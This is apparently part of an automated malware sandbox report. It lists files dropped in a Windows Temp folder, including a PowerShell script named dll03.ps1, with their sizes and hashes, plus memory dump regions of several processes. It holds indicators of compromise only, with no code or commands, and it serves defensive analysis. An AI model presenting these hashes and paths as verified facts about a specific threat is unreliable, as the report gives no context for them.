        • C:\Users\Admin\AppData\Local\Temp\dll01.txt

          Filesize

          34B

          MD5

          3a54a7249d169ee6d6425beff939e129

          SHA1

          e253197ef68c0ab01e9ca788d5417a2aa823e102

          SHA256

          ee2568c1796417f2782d2eb3b49d6e0072ca038aa063fc88c54d31308a2ef4dd

          SHA512

          d71e47b4093064f6e9167ffb0cb0ef2aec29c93b94ca1438c3d01008b0c40526cddd8a2d95a4e0fc4401c6b4d2dde53658c75806b4b155611ae4bd5dc5f08b6c

        • C:\Users\Admin\AppData\Local\Temp\dll02.txt

          Filesize

          71KB

          MD5

          b5c7d84fb855ddfafda03af292f19e2f

          SHA1

          d7f931aeb01e721f4bdb7874cd864eb0a13eb577

          SHA256

          5f4ab753ee81c5b66db0bc7987554a109cd9c9968da7dc3396b7b87f59a63464

          SHA512

          8666b2374bdb4f8678efa4406b80bd4db0e69ac1850983c21bd7106a7e640f01b00ea8e74f9caee16f9025f0932fd9676933daaae97d9f589bffb795baf332ed

        • C:\Users\Admin\AppData\Local\Temp\dll03.ps1

          Filesize

          1KB

          MD5

          4a105a6ce6fef2520a775e37990fe8ce

          SHA1

          cb64542b28625cc9641d223820ace159d8b5f0c2

          SHA256

          8e4341f8a897ed6988a46708d2a765fb0ac317e409d55fd0e390e4c74513eef6

          SHA512

          aca9333613be12dd3dc04689e501aa2e22b647ea2f15598439910f983a55f9aafcde8fb93093c0c8f46a006f276a723b997f04cce5bca29df608c125f06ee815

        • memory/976-115-0x0000000000400000-0x0000000000410000-memory.dmp

          Filesize

          64KB

        • memory/1608-37-0x000001BBB1C10000-0x000001BBB1C1A000-memory.dmp

          Filesize

          40KB

        • memory/2596-103-0x000001D659730000-0x000001D65973A000-memory.dmp

          Filesize

          40KB

        • memory/3140-87-0x00007FFBD7890000-0x00007FFBD8351000-memory.dmp

          Filesize

          10.8MB

        • memory/3140-0-0x00007FFBD7893000-0x00007FFBD7895000-memory.dmp

          Filesize

          8KB

        • memory/3140-12-0x00007FFBD7890000-0x00007FFBD8351000-memory.dmp

          Filesize

          10.8MB

        • memory/3140-11-0x00007FFBD7890000-0x00007FFBD8351000-memory.dmp

          Filesize

          10.8MB

        • memory/3140-1-0x0000014463B60000-0x0000014463B82000-memory.dmp

          Filesize

          136KB